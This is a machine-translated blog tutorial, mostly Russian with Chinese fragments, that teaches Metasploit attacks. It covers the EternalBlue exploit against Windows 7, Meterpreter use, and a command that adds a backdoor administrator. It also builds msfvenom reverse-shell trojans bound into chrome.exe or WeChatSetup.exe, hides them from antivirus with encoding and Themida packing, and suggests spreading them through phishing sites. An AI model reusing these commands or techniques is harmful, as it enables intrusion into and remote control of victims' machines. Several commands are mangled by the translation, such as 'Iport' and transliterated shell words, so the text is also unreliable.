[P3] Самый мощный инструмент проникновения — Metasploit (подробное руководство по установке, настройке и использованию)


Что включает в себя метасплоит? , атака метасплоита на операционную систему Windows, атака метасплоита Eternal Blue, полный процесс, использование инструмента проникновения Kali для создания трояна удаленного управления, пример атаки метасплоита, троянская техника обхода антивирусного программного обеспечения msfvenom, упаковщик техники антивирусного программного обеспечения msfvenom, установка Windows Themida , Учебник по использованию Themida.


1. Что такое метасплоит?

Самый мощный инструмент проникновения Kali — Metasploit

  • msf — это инструмент с открытым исходным кодом для использования и тестирования уязвимостей безопасности, который объединяет распространенные уязвимости переполнения и популярные шеллкоды на различных платформах и постоянно обновляется.

  • Metasploit делает сложный процесс атаки на уязвимости очень простым: после нескольких часов обучения новичок в компьютере может запускать вредоносные атаки на основные уязвимости, такие как операционные системы.

2. Metasploit атакует операционную систему Windows

1. msfconsole: запустите командную строку Metasploit [командная строка очень эффективна и проста в использовании]

2. Что нужно сделать перед запуском метасплоита:

  • Открыть терминал Кали

  • Используйте команду sudo su и введите пароль kali kali, чтобы переключиться на пользователя root.

  • Используйте команду msfdb init для инициализации базы данных Metasploit (*необязательно).

3. Этапы работы:

(1), sudo su переключиться на пользователя root суперадминистратора, пароль kali (пользователям без root необходимо создать его самостоятельно)

  • судо су

Вставьте сюда описание изображения

(2) msfconsole запускает интерфейс командной строки Metasploit

  • мсфконсоль

Вставьте сюда описание изображения

3. Весь процесс метасплойта, атакующего Eternal Blue

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件

1. Используйте модуль: используйте эксплойт/windows/smb/ms17_010_eternalblue.

2. Установите необходимые параметры: просмотрите необходимые параметры [*обязательно — да] показать параметры

3. Этапы работы

(1) Вы можете использовать номер для поиска модулей.Номер Eternal Blue определен Microsoft как ms17_010.

  • поиск ms17_010

Вставьте сюда описание изображения

  • эксплойт: сценарий атаки на уязвимость

Как показано на рисунке, вы можете использовать «Описание», чтобы увидеть, что делает модуль.

(2), используйте модули

Два метода:

  • использовать имя модуля

  • используйте номер модуля

Вставьте сюда описание изображения

(3) В модуле конфигурации (настроек) вы можете сначала проверить настройки и указать MSF, кого атаковать и что делать.

  • показать варианты

Вставьте сюда описание изображения

  • Обязательно: вам нужно только настроить обязательную опцию на «Да».

  • РХОСТ: адрес

  • RPORT: порт, по умолчанию 445.

  • VERIFY_ARCH, VERIFY_TARGET: эти два параметра уже настроены, оставьте значение по умолчанию.

  • Параметры полезной нагрузки: Полезная нагрузка для атаки, по умолчанию windows/x64/meterpreter/reverse_tcp: получить разрешения на выполнение команд целевой машины; что вы хотите делать после атаки?

  • EXITFUNC: уже настроено по умолчанию.

  • LHOST: адрес прослушивания, IP-адрес атакующей машины.

  • LPORT: порт прослушивания

(4) Запустите дрон, выиграйте 7

  • Ссылка на установку дрона-мишени: https://blog.csdn.net/qq_45138120/article/details/131350059

  • Целевая машина — это виртуальная машина Windows под управлением VMware. Версия Windows не имеет значения.

(5) Откройте cmd и используйте ipconfig, чтобы просмотреть IP-адрес целевого компьютера.

  • ipконфигурация

Вставьте сюда описание изображения

(6), Кали устанавливает адрес цели атаки

  • установить IP-адрес целевой машины RHOSTS

Вставьте сюда описание изображения

(7) После завершения настроек вы можете снова использовать параметры отображения, чтобы проверить, завершена ли настройка.

  • показать варианты

Вставьте сюда описание изображения

Как показано на рисунке: Проверьте, является ли Текущая настройка, для которой обязательным элементом конфигурации является «да», пустой. Если он не пуст, конфигурация завершена.

(8), вы можете изменить порт LHOST по умолчанию.

  • установить порт 22222

Вставьте сюда описание изображения

注:端口范围 0-65535


Расширение: проверьте, открыт ли порт

① Проверьте, открыт ли порт 445.

  • нетстат -ан

Вставьте сюда описание изображения

② При атаке дрона здесь необходимо отключить брандмауэр.

Вставьте сюда описание изображения


(9), запустить модуль

  • бегать

Вставьте сюда описание изображения

Как показано на рисунке, целевая машина будет автоматически атакована и будет получено указанное разрешение на выполнение. После успешной атаки сначала напечатайте WIN и введитеmeterpreter.

meterpreter:拿到了 Win 7 靶机的权限

(10) Вы можете использовать справку для просмотра команд, которые можно использовать.

Вставьте сюда описание изображения

  • Команда: команда

  • Описание: Описание или объяснение команды.

  • выключение: выключить

  • Команды пользовательского интерфейса: команды пользовательского интерфейса.

  • GetDesktop: скриншот

  • keyscna: отправлять команды клавиатуры

  • мышь: отправлять команды мыши

(11), выход

  • Выход

Вставьте сюда описание изображения

4. Что может сделать метасплоит после успешной атаки?

1. Что можно сделать после успешной атаки?

  • Meterpreter — мощный модуль пост-проникновения. Вы можете ввести help, чтобы просмотреть справочную информацию.

  • Удаленное управление, выполнение команд, мониторинг камер, получение пароля, создание бэкдор-пользователей, уничтожение и вмешательство в систему... Эти, казалось бы, очень сложные и сложные операции можно выполнить с помощью одной строки или нескольких букв и простых команд вmeterpreter.

  • Пример. Создайте бэкдор-пользователя и включите удаленное подключение.

    • оболочка

    • сетевой пользователь zhangsan 123456 /add && сетевые администраторы локальной группы zhangsan /add

    • Выход

    • запустите getgui -e

2. Используйте инструмент проникновения Kali для создания троянов удаленного управления.

(1) msfvenom — это программное обеспечение, используемое для создания бэкдоров. Оно запускает бэкдоры на целевой машине и отслеживает их локально.

  • яд: яд, яд

  • [* в оболочке используется msfvenom, а не терминал msfconsole]

(2) Бэкдор исполняемой программы Windows:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

  • msfvenom: инструмент, используемый для выполнения

  • -p: полезная нагрузка

  • windows/x64/meterpreter/reverse_tcp: имя_полезной нагрузки система/архитектура/функция/метод; если вы хотите атаковать Linux, просто замените windows на Linux (android, mac)

  • lhost=192.168.123.136 Iport=9999: настройки полезной нагрузки (адрес Kali, порт Kali)

  • -f: формат

  • exe: exe, исполняемый файл Windows (ipk, jar, war)

  • -o: вывод, имя входного файла, например demo.exe

4.1. Этапы работы

(1), Создать троянский файл

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 Iport=9999 -f exe -o demo.exe

Вставьте сюда описание изображения

(2) Как показано на рисунке, файл создается по текущему пути.

  • Вы можете использовать ls для просмотра

  • Вы можете использовать pwd для просмотра абсолютного пути к рабочему каталогу.

Вставьте сюда описание изображения

(3) Вы можете использовать фишинговые веб-сайты, чтобы заставить жертв нажать на ссылку.

Вставьте сюда описание изображения

(4) Загрузите трояна на локальный компьютер, demo.exe.

При перетаскивании на локальную обязательно отключите антивирусное ПО.

Когда троянский вирус загружается локально, он будет перехвачен антивирусным программным обеспечением.В дальнейшем вам нужно будет разрешить трояну обходить антивирусное программное обеспечение.

Вставьте сюда описание изображения

Троянские вирусы не могут быть запущены напрямую: как и в случае с рыбной ловлей, троянского коня необходимо посадить на рыболовный крючок.

(5) Введите msfconsole из консоли терминала.

  • мсфконсоль

Вставьте сюда описание изображения

(6), используйте модуль эксплойта/мульти/обработчика

  • использовать эксплойт/мульти/обработчик

Вставьте сюда описание изображения

(7), Просмотр настроек

  • показать варианты

  • Можно сократить: варианты

Вставьте сюда описание изображения

  • Параметры полезной нагрузки: настройки загрузки для атаки (устанавливаются в значение playload_name, установленное при создании бэкдора исполняемой программы)

(8) Установите настройки загрузки атаки (установите значение playload_name, установленное при создании бэкдора исполняемой программы)

  • установить полезную нагрузку windows/x64/meterpreter/reverse_tcp

Вставьте сюда описание изображения

(9), установить адрес Кали

  • установить lhost 192.168.159.128

Вставьте сюда описание изображения

(10) Установите порт (установите значение Iport, установленное при создании бэкдора исполняемой программы, который должен быть согласованным)

  • установить порт 9999

Вставьте сюда описание изображения

(11) Вы можете использовать параметры, чтобы снова просмотреть информацию о настройках.

Вставьте сюда описание изображения

(12), беги

  • бегать

Вставьте сюда описание изображения

Теперь, когда крючок брошен в реку, есть два способа дождаться, пока рыба возьмет наживку: 1. Надавить рыбу на крючок и воспользоваться лазейкой; 2. Цзян Тайгун ловит рыбу, и желающие возьмут рыбу. приманка. Побуждаем рыбу взять наживку

(13) Если жертва клюнула на удочку, дважды щелкните локальный файл deom.exe.

Вставьте сюда описание изображения

(14), как показано на картинке, жертва клюнула на наживку

Вставьте сюда описание изображения

  • meterpreter: получить разрешения на выполнение с компьютера жертвы.

(15) Войдите в справку, чтобы просмотреть командные операции, которые можно выполнить.

  • помощь

Вставьте сюда описание изображения

4.2. Примеры атак

(1), webcam_list, проверить, есть ли на компьютере жертвы камера

  • webcam_list

Вставьте сюда описание изображения

(2) Я использую настольный компьютер, поэтому камеры нет.

5. Советы по обходу антивирусного ПО с помощью msfvenom

Самое базовое антивирусное программное обеспечение [ Эффект других антивирусных программ отличается, попробуйте сами в конкретных обстоятельствах] *

5.1. Объединение троянов

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x notepad++.exe -o notepad++.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x firefox.exe -o firefox.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -o firefox.exe

- -x:模板(要使用哪一个正常程序的模板作为后门的生成)
注:如果 notepad++ 过不了,可以换其它软件;路径下必须存在可执行程序
- -e /指定编码方式对攻击载荷进行重新编码
- -x /指定木马捆绑在哪个可执行程序模板上
- -i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现
- -f /指定 msf 编码器输出程序的格式
- -o /指定处理完毕后的文件输出路径

注:使用捆绑木马时,路径下必须存在可执行程序

(1) Сначала скопируйте исполняемую программу в путь, где создается троян, например: chrome.exe.

Вставьте сюда описание изображения

(2) Используйте msfvenom для создания трояна в среде Windows и свяжите его с chrome.exe для создания синтетического коня chrome01.exe.

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.159.128 lport=9999 -f exe -x chrome.exe -o chrome01.exe

Другие примеры:

  • msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

x86/shikata_ga_nai 进行多次编码的方式进行免杀处理

Вставьте сюда описание изображения

(3) По этому пути вы можете увидеть, что создается троянский конь chrome01.exe.

Вставьте сюда описание изображения

5.2. Упаковка: оболочка сжатия, оболочка шифрования.

5.2.1 Themida: программное обеспечение для упаковки
5.2.1.1. Установка Themida под Linux

注:此压缩包 rar包,必须在 Linux 系统下进行解压,使用需要在 windows 下使用


Расширение: Распакуйте RAR-пакет.

(1) Ссылка на руководство по установке пакета RAR: https://blog.csdn.net/weixin_40293999/article/details/122733513 .

(2) Разархивируйте пакет RAR.

Вставьте сюда описание изображения


5.2.1.2.Установка Themida под windows
  • Папка Themida Ссылка для загрузки сетевого диска Baidu под Windows: https://pan.baidu.com/s/1vGaNf92vzUZbsMlzMwXNFA?pwd=sfcx

  • Код извлечения: sfcx

  • После загрузки вы получите папку Themida_x32_x64_v3.0.4.0_Repacked.

Вставьте сюда описание изображения

5.2.1.2, Руководство по использованию Themida

Вставьте сюда описание изображения

注:Themida.exe为32位;Themida64.exe为64位

(1) Откройте загруженную папку Themida_x32_x64_v3.0.4.0_Repacked и дважды щелкните исполняемый файл Themida64.exe.

Вставьте сюда описание изображения

Вставьте сюда описание изображения

(2) Перетащите распакованный исполняемый файл трояна в программное обеспечение Themida.

Вставьте сюда описание изображения

Вставьте сюда описание изображения

  • Вы также можете выбрать путь к импортированному файлу трояна в программном обеспечении Themida.

(3) Нажмите «Протекст», чтобы упаковать

注:加壳前,先将杀毒软件关闭,等加壳完成后再打开

Вставьте сюда описание изображения

Защита упаковки выполняется автоматически.В случае успеха локально будет сгенерирован файл с добавленным именем Protext.

(4) Как показано на рисунке, обстрел завершен, нажмите «Закрыть».

Вставьте сюда описание изображения

Вставьте сюда описание изображения

Supongo que te gusta

Origin blog.csdn.net/qq_45138120/article/details/131350703
Recomendado
Clasificación